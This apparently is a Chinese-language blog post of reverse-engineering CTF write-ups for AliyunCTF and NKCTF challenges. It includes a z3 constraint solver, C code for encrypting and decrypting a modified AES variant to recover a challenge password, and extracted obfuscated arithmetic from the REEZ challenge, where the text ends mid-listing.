AliyunCTF & NKCTF

Last updated on April 15, 2024 pm

AliyunCTF - 欧拉!

NKCTF - login_system REEZ maimai

下周要打长城杯,正好这个周末有几个比赛,做点题目玩玩

AliyunCTF - 欧拉!

逻辑很简单,全是约束,直接z3梭哈

那些置零的语句,转化为不相等就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from z3 import *

flag = [BitVec('flag_%d' % (i),8)for i in range(29)]
s = Solver()
# key = [0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0]
key = [2,5,8,12,13,14,17,18,21,24,25,28,29,31,35,37,39,42,45,46,51,53,56,58,59,62,65,71,72,73,75,77,78,79]
f1 = 'aliyunctf{'
for i in range(len(f1)):
    s.add(flag[i] == ord(f1[i]))
s.add(flag[28] == ord("}"))

for i in range(18):
    s.add(flag[10 + i] < ord('9'))
    s.add(flag[10 + i] >= ord('0'))

s.add(flag[11] > flag[12])
s.add(flag[13] < flag[14])
s.add(flag[10] == flag[16 + 2])
s.add(flag[16 + 5] == flag[16 + 9])

s.add(flag[16 + 4] > flag[15])
s.add(flag[13] < flag[16 + 7])
s.add(flag[16 + 1] < flag[14])
s.add(flag[16 + 8] == 55)
s.add(flag[11 + 16] == 52)

for i in range(18-1):
    condition_1 = []
    condition_2 = []
    for k in range(i+1,18-1):
        condition_1.append(((flag[i + 10]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
        condition_1.append(((flag[i + 10 + 1]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
        
        condition_1.append(((flag[i + 10]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10 + 1]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
        condition_1.append(((flag[i + 10 + 1]-48) * 8 + (flag[i+10]-48) + (flag[i+10+1]-48)) != (flag[k + 10 + 1]-48) * 8 + (flag[k + 10] - 48) + (flag[k+ 10 +1] - 48))
        condition_2.append(And(condition_1))
    s.add(And(condition_2))

for i in range(18-1):
    condition_2 = []
    condition_3 = []
    for k in range(len(key)):
        for j in range(len(key)):
            condition_1 = []
            condition_1.append(((flag[i + 10] - 48 )* 8 + flag[i + 10] - 48 + flag[i + 10 + 1] - 48) == key[k])
            condition_1.append(((flag[i + 10 + 1] - 48) * 8 + flag[i + 10] - 48 + flag[i + 10 + 1] - 48) == key[j])
            condition_2.append(And(condition_1))
    s.add(Or(condition_2))
s.check()

m = s.model()
for i in flag:
    print(chr(m[i].as_long()),end='')

print()

NKCTF - login_system

用户名以及密码的前半部分很容易计算

username: user01_nkctf2024
password: uSer1p4ss_16位xxx

后面就是魔改的AES,经过调试得到加密脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <string.h>
unsigned char Sbox[16][16] = {
	/* 0     1     2     3     4     5     6     7     8     9     a     b     c     d     e     f */
	{49, 82, 90, 200, 11, 172, 243, 58, 139, 84, 39, 155, 171, 149, 222, 131},
	{96, 203, 83, 127, 196, 227, 10, 151, 224, 41, 213, 104, 197, 223, 244, 123},
	{170, 214, 66, 120, 108, 233, 112, 23, 215, 55, 36, 73, 117, 169, 137, 103},
	{3, 250, 217, 145, 180, 91, 194, 78, 146, 252, 70, 177, 115, 8, 199, 116},
	{9, 175, 236, 245, 77, 45, 234, 165, 218, 239, 166, 43, 126, 12, 143, 176},
	{4, 6, 98, 132, 21, 142, 18, 29, 68, 192, 226, 56, 212, 71, 40, 69},
	{110, 157, 99, 207, 230, 140, 24, 130, 27, 44, 238, 135, 148, 16, 193, 32},
	{7, 74, 164, 235, 119, 188, 211, 225, 102, 42, 107, 231, 121, 204, 134, 22},
	{208, 209, 25, 85, 60, 159, 251, 48, 152, 189, 184, 241, 158, 97, 205, 144},
	{206, 124, 141, 87, 174, 106, 179, 61, 118, 167, 113, 136, 162, 186, 79, 62},
	{64, 100, 15, 72, 33, 53, 54, 47, 232, 20, 93, 81, 216, 181, 254, 210},
	{150, 147, 161, 182, 67, 13, 76, 128, 201, 255, 163, 221, 114, 5, 89, 191},
	{14, 38, 52, 31, 19, 229, 220, 242, 198, 80, 30, 228, 133, 183, 57, 138},
	{202, 237, 156, 187, 86, 35, 26, 240, 50, 88, 178, 101, 51, 111, 65, 190},
	{63, 109, 17, 0, 173, 95, 195, 129, 37, 168, 160, 154, 246, 247, 94, 153},
	{34, 46, 75, 249, 59, 2, 122, 185, 92, 105, 248, 28, 219, 1, 125, 253},
};
void AddRoundKey(unsigned char *plaintext, unsigned char *CipherKey) /*轮密钥加*/
{

	unsigned int v4[4] = {0};
	for (int i = 0; i < 4; i++)
	{
		for (int k = 3; k > -1; k--)
		{
			v4[i] = (v4[i] << 8) | CipherKey[i * 4 + k];
		}
	}
	// printf("%x,", v4[0]);
	for (int i = 0; i < 4; i++)
	{
		for (int k = 0; k < 4; k++)
		{
			plaintext[4 * i + k] ^= v4[k] >> (8 * (3 - i));
		}
	}
}
void SubBytes(unsigned char *plaintext, unsigned char *plaintextencrypt, int count) /*S盒置换*/
{
	unsigned int row, column;
	for (int i = 0; i < count; i++)
	{
		row = (plaintext[i] & 0xF0) >> 4;
		column = plaintext[i] & 0x0F;
		plaintextencrypt[i] = Sbox[row][column];
	}
}

void ShiftRows(unsigned char *plaintextencrypt) /*行移位*/
{
	unsigned char temp = 0;
	unsigned v4 = 0;
	for (int i = 0; i < 4; i++)
	{
		v4 = 0;
		for (int k = 0; k < 4; k++)
		{
			v4 = (v4 << 8) | plaintextencrypt[i * 4 + k];
		}
		// printf("%x,", v4);
		v4 = (v4 >> (8 * (4 - i))) | ((v4 << (8 * i)) & 0xffffffff);
		// printf("%x,", v4);
		plaintextencrypt[i * 4] = (v4 & 0xff000000) >> 24;
		plaintextencrypt[i * 4 + 1] = (v4 & 0x00ff0000) >> 16;
		plaintextencrypt[i * 4 + 2] = (v4 & 0x0000ff00) >> 8;
		plaintextencrypt[i * 4 + 3] = (v4 & 0x000000ff);
	}
}

unsigned char Mult2(unsigned char v10, unsigned char input) /*列混淆*/
{
	unsigned char v5 = 0;
	int v7 = 0;
	for (int i = 0; i <= 7; i++)
	{
		if ((v10 & 1) != 0)
		{
			v5 ^= input;
		}
		v7 = input & 0x80;
		input *= 2;
		if (v7)
			input ^= 0x1b;
		v10 >>= 1;
	}
	return v5;
}
void MixColumns(unsigned char *plaintextencrypt, unsigned char *plaintextencrypt2)
{
	unsigned int v10[4] = {0x1010302,
						   0x1030201,
						   0x3020101,
						   0x2010103};
	unsigned char temp[16] = {0};
	memcpy(temp, plaintextencrypt, 16);
	int v1, v2, v3;
	for (int k = 0; k <= 3; k++)
	{
		for (int m = 0; m <= 3; m++)
		{
			v1 = Mult2(v10[k], temp[m]);
			v2 = Mult2(v10[k] >> 8, temp[m + 4]) ^ v1;
			v3 = Mult2(v10[k] >> 16, temp[m + 8]) ^ v2;
			plaintextencrypt2[4 * k + m] = Mult2(v10[k] >> 24, temp[m + 12]) ^ v3;
		}
	}
}

int main()
{
	// C4 8E 5A 45 CB 1D 54 28 F3 92 7B 47 0A F3 27 4D
	printf("**************AES加密***************\n");
	int i = 0, k;
	unsigned char PlainText[16] = {0x39, 0x37, 0x32, 0x64, 0x65, 0x39, 0x61, 0x65, 0x65, 0x63, 0x62, 0x34, 0x37, 0x64, 0x63, 0x38},
				  CipherKey[13][16] = {
					  {0x72, 0x65, 0x73, 0x75, 0x6e, 0x5f, 0x31, 0x30, 0x66, 0x74, 0x63, 0x6b, 0x34, 0x32, 0x30, 0x32},
					  {0xab, 0xd1, 0xaa, 0x77, 0xc5, 0x8e, 0x9b, 0x47, 0xa3, 0xfa, 0xf8, 0x2c, 0x97, 0xc8, 0xc8, 0x1e},
					  {0x5f, 0xec, 0x6c, 0xb3, 0x9a, 0x62, 0xf7, 0xf4, 0x39, 0x98, 0xf, 0xd8, 0xae, 0x50, 0xc7, 0xc6},
					  {0x83, 0x12, 0x68, 0x45, 0x19, 0x70, 0x9f, 0xb1, 0x20, 0xe8, 0x90, 0x69, 0x8e, 0xb8, 0x57, 0xaf},
					  {0x51, 0xdf, 0xa1, 0x50, 0x48, 0xaf, 0x3e, 0xe1, 0x68, 0x47, 0xae, 0x88, 0xe6, 0xff, 0xf9, 0x27},
					  {0x46, 0x1c, 0x5c, 0x29, 0xe, 0xb3, 0x62, 0xc8, 0x66, 0xf4, 0xcc, 0x40, 0x80, 0xb, 0x35, 0x67},
					  {0xc4, 0xcc, 0xc7, 0x52, 0xca, 0x7f, 0xa5, 0x9a, 0xac, 0x8b, 0x69, 0xda, 0x2c, 0x80, 0x5c, 0xbd},
					  {0xc1, 0xb9, 0x17, 0xc6, 0xb, 0xc6, 0xb2, 0x5c, 0xa7, 0x4d, 0xdb, 0x86, 0x8b, 0xcd, 0x87, 0x3b},
					  {0x70, 0x48, 0xa0, 0x76, 0x7b, 0x8e, 0x12, 0x2a, 0xdc, 0xc3, 0xc9, 0xac, 0x57, 0xe, 0x4e, 0x97},
					  {0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
					  {0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
					  {0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
					  {0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
				  }, //   CipherKey1[16] = {0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c},
		PlainText1[16] = {0}, PlainText2[16] = {0};
	unsigned char enc[] = {0xb0, 0xcc, 0x93, 0xea, 0xe9, 0x2f, 0xef, 0x56, 0x99, 0x39, 0x6e, 0x2, 0x3b, 0x4f, 0x9e, 0x42};
	for (int i = 0; i <= 3; ++i)
	{
		for (int j = 0; j <= 3; ++j)
		{
			PlainText1[j * 4 + i] = PlainText[4 * i + j];
		}
	}
	memcpy(PlainText, PlainText1, 16);

	AddRoundKey(PlainText, CipherKey[0]);

	for (i = 0; i < 9; i++)
	{
		// printf("\n第%d轮循环:\n", i + 1);
		SubBytes(PlainText, PlainText1, 16); /*S盒置换*/
		// printf("\n");
		ShiftRows(PlainText1);				/*行移位*/
		MixColumns(PlainText1, PlainText2); /*列混淆*/
		AddRoundKey(PlainText2, CipherKey[1 + i]);
		memcpy(PlainText, PlainText2, 16);
	}

	SubBytes(PlainText, PlainText1, 16); /*S盒置换*/

	ShiftRows(PlainText1); /*行移位*/

	AddRoundKey(PlainText1, CipherKey[10]);

	unsigned char output[16] = {0};
	// int k = 0;

	// printf("\n");
	k = 0;
	for (int i = 0; i <= 3; ++i)
	{
		for (int j = 0; j <= 3; ++j)
		{
			output[k++] = PlainText1[4 * j + i];
		}
	}
	for (k = 0; k < 16; k++)
		printf("0x%02X,", output[k]);

}

除了SubBytes其他全部都被魔改了一下。

先计算逆S盒

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned char Te_InvS[16][16] = {0}; // 逆S盒缓存
unsigned char Te_InVSAdd[2] = {0};	 // 位置
for (unsigned char i = 0; i < 16; i++)
{ // 计算逆S盒
	for (unsigned char n = 0; n < 16; n++)
	{
		Te_InVSAdd[0] = (Sbox[i][n] >> 4) & 0x0f;			// 取行
		Te_InVSAdd[1] = (Sbox[i][n] >> 0) & 0x0f;			// 取列
		Te_InvS[Te_InVSAdd[0]][Te_InVSAdd[1]] = i * 16 + n; // 置值
	}
}

for (unsigned char i = 0; i < 16; i++)
{ 
	printf("{");
	for (unsigned char n = 0; n < 16; n++)
	{
		printf("0x%02X,", Te_InvS[i][n]);
	}
	printf("}\n");
}

再搓整个解密脚本,列混淆那里可以丢给AI写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <string.h>
unsigned char Sbox_re[16][16] = {{0xe3, 0xfd, 0xf5, 0x30, 0x50, 0xbd, 0x51, 0x70, 0x3d, 0x40, 0x16, 0x4, 0x4d, 0xb5, 0xc0, 0xa2},
                                 {0x6d, 0xe2, 0x56, 0xc4, 0xa9, 0x54, 0x7f, 0x27, 0x66, 0x82, 0xd6, 0x68, 0xfb, 0x57, 0xca, 0xc3},
                                 {0x6f, 0xa4, 0xf0, 0xd5, 0x2a, 0xe8, 0xc1, 0xa, 0x5e, 0x19, 0x79, 0x4b, 0x69, 0x45, 0xf1, 0xa7},
                                 {0x87, 0x0, 0xd8, 0xdc, 0xc2, 0xa5, 0xa6, 0x29, 0x5b, 0xce, 0x7, 0xf4, 0x84, 0x97, 0x9f, 0xe0},
                                 {0xa0, 0xde, 0x22, 0xb4, 0x58, 0x5f, 0x3a, 0x5d, 0xa3, 0x2b, 0x71, 0xf2, 0xb6, 0x44, 0x37, 0x9e},
                                 {0xc9, 0xab, 0x1, 0x12, 0x9, 0x83, 0xd4, 0x93, 0xd9, 0xbe, 0x2, 0x35, 0xf8, 0xaa, 0xee, 0xe5},
                                 {0x10, 0x8d, 0x52, 0x62, 0xa1, 0xdb, 0x78, 0x2f, 0x1b, 0xf9, 0x95, 0x7a, 0x24, 0xe1, 0x60, 0xdd},
                                 {0x26, 0x9a, 0xbc, 0x3c, 0x3f, 0x2c, 0x98, 0x74, 0x23, 0x7c, 0xf6, 0x1f, 0x91, 0xfe, 0x4c, 0x13},
                                 {0xb7, 0xe7, 0x67, 0xf, 0x53, 0xcc, 0x7e, 0x6b, 0x9b, 0x2e, 0xcf, 0x8, 0x65, 0x92, 0x55, 0x4e},
                                 {0x8f, 0x33, 0x38, 0xb1, 0x6c, 0xd, 0xb0, 0x17, 0x88, 0xef, 0xeb, 0xb, 0xd2, 0x61, 0x8c, 0x85},
                                 {0xea, 0xb2, 0x9c, 0xba, 0x72, 0x47, 0x4a, 0x99, 0xe9, 0x2d, 0x20, 0xc, 0x5, 0xe4, 0x94, 0x41},
                                 {0x4f, 0x3b, 0xda, 0x96, 0x34, 0xad, 0xb3, 0xcd, 0x8a, 0xf7, 0x9d, 0xd3, 0x75, 0x89, 0xdf, 0xbf},
                                 {0x59, 0x6e, 0x36, 0xe6, 0x14, 0x1c, 0xc8, 0x3e, 0x3, 0xb8, 0xd0, 0x11, 0x7d, 0x8e, 0x90, 0x63},
                                 {0x80, 0x81, 0xaf, 0x76, 0x5c, 0x1a, 0x21, 0x28, 0xac, 0x32, 0x48, 0xfc, 0xc6, 0xbb, 0xe, 0x1d},
                                 {0x18, 0x77, 0x5a, 0x15, 0xcb, 0xc5, 0x64, 0x7b, 0xa8, 0x25, 0x46, 0x73, 0x42, 0xd1, 0x6a, 0x49},
                                 {0xd7, 0x8b, 0xc7, 0x6, 0x1e, 0x43, 0xec, 0xed, 0xfa, 0xf3, 0x31, 0x86, 0x39, 0xff, 0xae, 0xb9}};
void AddRoundKey(unsigned char *plaintext, unsigned char *CipherKey) /*轮密钥加*/
{

    unsigned int v4[4] = {0};
    for (int i = 0; i < 4; i++)
    {
        for (int k = 3; k > -1; k--)
        {
            v4[i] = (v4[i] << 8) | CipherKey[i * 4 + k];
        }
    }
    // printf("%x,", v4[0]);
    for (int i = 0; i < 4; i++)
    {
        for (int k = 0; k < 4; k++)
        {
            plaintext[4 * i + k] ^= v4[k] >> (8 * (3 - i));
        }
    }
}

void ShiftRowsRe(unsigned char *plaintextencrypt) /*行移位*/
{
    unsigned char temp = 0;
    unsigned v4 = 0;
    for (int i = 0; i < 4; i++)
    {
        v4 = 0;
        for (int k = 0; k < 4; k++)
        {
            v4 = (v4 << 8) | plaintextencrypt[i * 4 + k];
        }
        // printf("%x,", v4);
        v4 = (v4 >> (8 * i)) | ((v4 << (8 * (4 - i))) & 0xffffffff);
        // printf("%x,", v4);
        plaintextencrypt[i * 4] = (v4 & 0xff000000) >> 24;
        plaintextencrypt[i * 4 + 1] = (v4 & 0x00ff0000) >> 16;
        plaintextencrypt[i * 4 + 2] = (v4 & 0x0000ff00) >> 8;
        plaintextencrypt[i * 4 + 3] = (v4 & 0x000000ff);
    }
}

void SubBytesRe(unsigned char *plaintext, unsigned char *plaintextencrypt, int count) /*S盒逆置换*/
{
    unsigned int row, column;
    // 填充Sbox矩阵
    for (int i = 0; i < count; i++)
    {
        row = (plaintext[i] & 0xF0) >> 4;
        column = plaintext[i] & 0x0F;
        plaintextencrypt[i] = Sbox_re[row][column];
    }
}

unsigned char mult(unsigned char x, unsigned char y)
{
    unsigned char r = 0;
    for (int i = 0; i < 8; i++)
    {
        if ((y & 0x1) == 1)
        {
            r ^= x;
        }
        unsigned char hbit = x & 0x80;
        x <<= 1;
        if (hbit == 0x80)
        {
            x ^= 0x1b;
        }
        y >>= 1;
    }
    return r;
}

void inv_mix_columns(unsigned char *s)
{
    unsigned char temp[16];
    for (int i = 0; i < 16; i++)
    {
        temp[i] = s[i];
    }
    for (int i = 0; i < 4; i++)
    {
        s[i] = mult(0x0e, temp[i]) ^ mult(0x0b, temp[i + 4]) ^ mult(0x0d, temp[i + 8]) ^ mult(0x09, temp[i + 12]);
        s[i + 4] = mult(0x09, temp[i]) ^ mult(0x0e, temp[i + 4]) ^ mult(0x0b, temp[i + 8]) ^ mult(0x0d, temp[i + 12]);
        s[i + 8] = mult(0x0d, temp[i]) ^ mult(0x09, temp[i + 4]) ^ mult(0x0e, temp[i + 8]) ^ mult(0x0b, temp[i + 12]);
        s[i + 12] = mult(0x0b, temp[i]) ^ mult(0x0d, temp[i + 4]) ^ mult(0x09, temp[i + 8]) ^ mult(0x0e, temp[i + 12]);
    }
}

int main()
{
    //// user: user01_nkctf2024
    // pass: uSer1p4ss_9ee779cd2abcde48
    unsigned char enc[] = {0xb0, 0xcc, 0x93, 0xea, 0xe9, 0x2f, 0xef, 0x56, 0x99, 0x39, 0x6e, 0x2, 0x3b, 0x4f, 0x9e, 0x42};
    // unsigned char enc[] = {0xB3, 0x0E, 0x2F, 0xD7, 0x77, 0x31, 0x3E, 0xC5, 0x68, 0x36, 0x89, 0x00, 0x2D, 0x91, 0xD3, 0xFD};
    unsigned char decrypt[16] = {0};
    unsigned char decryp2[16] = {0};
    unsigned char CipherKey[13][16] = {
        {0x72, 0x65, 0x73, 0x75, 0x6e, 0x5f, 0x31, 0x30, 0x66, 0x74, 0x63, 0x6b, 0x34, 0x32, 0x30, 0x32},
        {0xab, 0xd1, 0xaa, 0x77, 0xc5, 0x8e, 0x9b, 0x47, 0xa3, 0xfa, 0xf8, 0x2c, 0x97, 0xc8, 0xc8, 0x1e},
        {0x5f, 0xec, 0x6c, 0xb3, 0x9a, 0x62, 0xf7, 0xf4, 0x39, 0x98, 0xf, 0xd8, 0xae, 0x50, 0xc7, 0xc6},
        {0x83, 0x12, 0x68, 0x45, 0x19, 0x70, 0x9f, 0xb1, 0x20, 0xe8, 0x90, 0x69, 0x8e, 0xb8, 0x57, 0xaf},
        {0x51, 0xdf, 0xa1, 0x50, 0x48, 0xaf, 0x3e, 0xe1, 0x68, 0x47, 0xae, 0x88, 0xe6, 0xff, 0xf9, 0x27},
        {0x46, 0x1c, 0x5c, 0x29, 0xe, 0xb3, 0x62, 0xc8, 0x66, 0xf4, 0xcc, 0x40, 0x80, 0xb, 0x35, 0x67},
        {0xc4, 0xcc, 0xc7, 0x52, 0xca, 0x7f, 0xa5, 0x9a, 0xac, 0x8b, 0x69, 0xda, 0x2c, 0x80, 0x5c, 0xbd},
        {0xc1, 0xb9, 0x17, 0xc6, 0xb, 0xc6, 0xb2, 0x5c, 0xa7, 0x4d, 0xdb, 0x86, 0x8b, 0xcd, 0x87, 0x3b},
        {0x70, 0x48, 0xa0, 0x76, 0x7b, 0x8e, 0x12, 0x2a, 0xdc, 0xc3, 0xc9, 0xac, 0x57, 0xe, 0x4e, 0x97},
        {0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
        {0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
        {0xb4, 0x50, 0x74, 0x4e, 0x82, 0x8b, 0x18, 0x86, 0x68, 0x93, 0xbd, 0xe2, 0xd5, 0x85, 0x56, 0x11},
        {0x4d, 0x55, 0x7e, 0xe2, 0x36, 0xdb, 0x6c, 0xc8, 0xea, 0x18, 0xa5, 0x64, 0xbd, 0x16, 0xeb, 0xf3},
    };
    int k = 0;
    for (int i = 0; i <= 3; ++i)
    {
        for (int j = 0; j <= 3; ++j)
        {
            decrypt[4 * j + i] = enc[k++];
        }
    }
    // 0xE0, 0xA3, 0x8A, 0xA2, 0x51, 0xDD, 0x62, 0xBF, 0x19, 0x66, 0x34, 0xD6, 0xA7, 0x39, 0xB9, 0x33,
    AddRoundKey(decrypt, CipherKey[10]);
    ShiftRowsRe(decrypt);
    SubBytesRe(decrypt, decryp2, 16);

    for (int i = 0; i < 9; i++)
    {
        AddRoundKey(decryp2, CipherKey[9 - i]);
        inv_mix_columns(decryp2);
        ShiftRowsRe(decryp2);
        SubBytesRe(decryp2, decrypt, 16);
        memcpy(decryp2, decrypt, 16);
    }

    AddRoundKey(decryp2, CipherKey[0]);

    for (int i = 0; i <= 3; ++i)
    {
        for (int j = 0; j <= 3; ++j)
        {
            decrypt[j * 4 + i] = decryp2[4 * i + j];
        }
    }
    for (k = 0; k < 16; k++)
        printf("%c", decrypt[k]);
}

// 9ee779cd2abcde48%

NKCTF - REEZ

运行中会释放一个文件,然后运行那个文件,最后删除,可以下断点dump出那个文件

会发现就是一些逻辑运算,前面的运算提取出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
flag = [97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121]

flag[0] = -105         * (39          * (2           * (flag[0] & (-105                      * (39                       * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))                        + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)))                       + 23)                      + 111))           + (flag[0] ^ (-105                      * (39                       * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))                        + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)))                       + 23)                      + 111)))          + 23)         + 111
flag[1] = -105 * (39 * (2 * ((flag[13] ^ flag[14]) & flag[1]) + (flag[13] ^ flag[14] ^ flag[1])) + 23) + 111
flag[2] = -105      * (39       * (2 * (flag[2] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))        + (flag[2] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)))       + 23)      + 111
flag[3] = -105 * (39 * (2 * ((flag[17] ^ 0x17) & flag[3]) + (flag[17] ^ 0x17 ^ flag[3])) + 23) + 111
flag[4] = -105      * (39       * (2        * (flag[4] & (-105                * (39                 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))                  + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)))                 + 23)                + 111))        + (flag[4] ^ (-105                * (39                 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))                  + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[5] = -105 * (39 * (2 * (flag[5] & (~flag[23] + flag[21] + 1)) + (flag[5] ^ (~flag[23] + flag[21] + 1))) + 23) + 111
flag[6] = -105      * (39       * (2 * (flag[6] & (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111))        + (flag[6] ^ (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111)))       + 23)      + 111
flag[7] = -105      * (39       * (2 * (flag[7] & (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111))        + (flag[7] ^ (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111)))       + 23)      + 111
flag[8] = -105      * (39       * (2 * (flag[8] & (flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111)))        + (flag[8] ^ flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111)))       + 23)      + 111
flag[9] = ~flag[16] + -105 * (39 * (2 * (flag[17] & flag[9]) + (flag[17] ^ flag[9])) + 23) + 111 + 1
flag[10] = -105      * (39       * (2 * (flag[10] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))        + (flag[10] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)))       + 23)      + 111
flag[11] = -105      * (39       * (2        * (flag[12] & (-105                * (39                 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))                  + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)))                 + 23)                + 111))        + (flag[12] ^ (-105                * (39                 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))                  + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[12] = -105 * (39 * (2 * (flag[12] & flag[11]) + (flag[12] ^ flag[11])) + 23) + 111
flag[13] = -105 * (39 * (2 * (flag[13] & (flag[7] ^ flag[8])) + (flag[13] ^ flag[7] ^ flag[8])) + 23) + 111
flag[14] = -105      * (39       * (2        * (flag[5] & (-105                * (39                 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))                  + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)))                 + 23)                + 111))        + (flag[5] ^ (-105                * (39                 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))                  + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[15] = -105      * (39       * (2 * (flag[3] & (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111))        + (flag[3] ^ (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111)))       + 23)      + 111
flag[16] = -105 * (39 * (2 * ((flag[2] ^ 0x4D) & flag[16]) + (flag[2] ^ 0x4D ^ flag[16])) + 23) + 111
